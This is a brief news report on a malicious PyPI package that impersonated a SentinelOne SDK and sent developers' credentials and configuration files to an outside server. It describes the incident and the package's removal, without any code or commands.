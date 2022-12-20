Criminals posing as a well-known cybersecurity firm have been found in an attempt to steal data from software developers, researchers have discovered.

ReversingLabs Researchers Recently Discovered a Malicious Python (opens in a new tab) package in PyPI called “SentinelOne”. Named after a well-known US cybersecurity company, the package purports to be a legitimate client SDK that allows easy access to the SentinelOne API from a separate project.

However, the package also contains “api.py” files that contain the malicious code and allow threat actors to leak sensitive developer data to a third-party IP address (54.254.189.27).

Chase auth tokens and API keys

The stolen data includes Bash and Zsh histories, SSH keys, .gitconfig files, hosts files, AWS configuration information, Kube configuration information, and others. According to the post, these folders typically store auth tokens, secrets, and API keys, which would allow threat actors greater access to targeted cloud services and server endpoints.

The worst part is that the package offers the functionality that developers expect. This is actually a hijacked package, which means that unsuspecting developers could end up using it and ignorantly becoming victims. The good news is that ReversingLabs confirmed the malicious intent of the package and, after reporting it to both SentinelOne and PyPI, removed it from the repository.

In the days and weeks leading up to the removal, the malicious actors were quite active. The package was first uploaded to PyPI on December 11 and has been updated 20 times in less than 10 days.

One of the issues that was fixed with an update was the inability to extract data from Linux systems, the researchers found.

It’s hard to say if anyone fell for the scam, the researchers concluded, as there is no evidence that the package was used in an actual attack. Still, all published versions were downloaded more than 1,000 times.

Via: BleepingTeam (opens in a new tab)